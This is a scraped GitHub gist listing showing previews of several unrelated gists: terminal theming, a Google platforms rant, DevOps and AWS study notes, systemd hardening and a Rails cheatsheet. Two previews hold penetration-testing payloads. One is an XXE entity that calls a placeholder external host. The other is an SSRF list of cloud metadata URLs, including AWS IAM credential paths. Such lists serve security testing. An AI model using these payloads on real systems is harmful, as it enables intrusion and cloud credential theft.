Skip to content

Instantly share code, notes, and snippets.

Avatar

Kinnaird McQuade kmcquade

View GitHub Profile
@kevin-smets
kevin-smets / iterm2-solarized.md
Last active Sep 26, 2021
iTerm2 + Oh My Zsh + Solarized color scheme + Source Code Pro Powerline + Font Awesome + [Powerlevel10k] - (macOS)
View iterm2-solarized.md

Default

Default

Powerlevel10k

Powerlevel10k

View 20111011_SteveYeggeGooglePlatformRant.md

Stevey's Google Platforms Rant

I was at Amazon for about six and a half years, and now I've been at Google for that long. One thing that struck me immediately about the two companies -- an impression that has been reinforced almost daily -- is that Amazon does everything wrong, and Google does everything right. Sure, it's a sweeping generalization, but a surprisingly accurate one. It's pretty crazy. There are probably a hundred or even two hundred different ways you can compare the two companies, and Google is superior in all but three of them, if I recall correctly. I actually did a spreadsheet at one point but Legal wouldn't let me show it to anyone, even though recruiting loved it.

I mean, just to give you a very brief taste: Amazon's recruiting process is fundamentally flawed by having teams hire for themselves, so their hiring bar is incredibly inconsistent across teams, despite various efforts they've made to level it out. And their operations are a mess; they don't real

@jpswade
jpswade / devops_best_practices.md
Last active Sep 26, 2021
Devops Best Practices Checklist
View devops_best_practices.md

Find the original here article here: Devops Best Practices

DevOps started out as "Agile Systems Administration". In 2008, at the Agile Conference in Toronto, Andrew Shafer posted an offer to moderate an ad hoc "Birds of a Feather" meeting to discuss the topic of "Agile Infrastructure". Only one person showed up to discuss the topic: Patrick Debois. Their discussions and sharing of ideas with others advanced the concept of "agile systems administration". In that same year, Debois and Shafer formed an Agile Systems Administrator group on Google, with limited success. Patrick Debois did a presentation called "Infrastructure and Operations" addressing issues around involving more of the comp

@leonardofed
leonardofed / README.md
Last active Sep 26, 2021
A curated list of AWS resources to prepare for the AWS Certifications
View README.md


A curated list of AWS resources to prepare for the AWS Certifications

A curated list of awesome AWS resources you need to prepare for the all 5 AWS Certifications. This gist will include: open source repos, blogs & blogposts, ebooks, PDF, whitepapers, video courses, free lecture, slides, sample test and many other resources.


View XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@ageis
ageis / systemd_service_hardening.md
Last active Sep 26, 2021
Options for hardening systemd service units
View systemd_service_hardening.md

security and hardening options for systemd service units

A common and reliable pattern in service unit files is thus:

NoNewPrivileges=yes
PrivateTmp=yes
PrivateDevices=yes
DevicePolicy=closed
ProtectSystem=strict
@rgl
rgl / wait_for_http_200.sh
Last active Sep 24, 2021
Wait for an HTTP endpoint to return 200 OK with Bash and curl
View wait_for_http_200.sh
bash -c 'while [[ "$(curl -s -o /dev/null -w ''%{http_code}'' localhost:9000)" != "200" ]]; do sleep 5; done'
# also check https://gist.github.com/rgl/c2ba64b7e2a5a04d1eb65983995dce76
@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active Sep 24, 2021
Cloud Metadata Dictionary useful for SSRF Testing
View cloud_metadata.txt
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
@mdang
mdang / RAILS_CHEATSHEET.md
Last active Sep 24, 2021
Ruby on Rails Cheatsheet
View RAILS_CHEATSHEET.md

Ruby on Rails Cheatsheet

Architecture

Create a new application

Install the Rails gem if you haven't done so before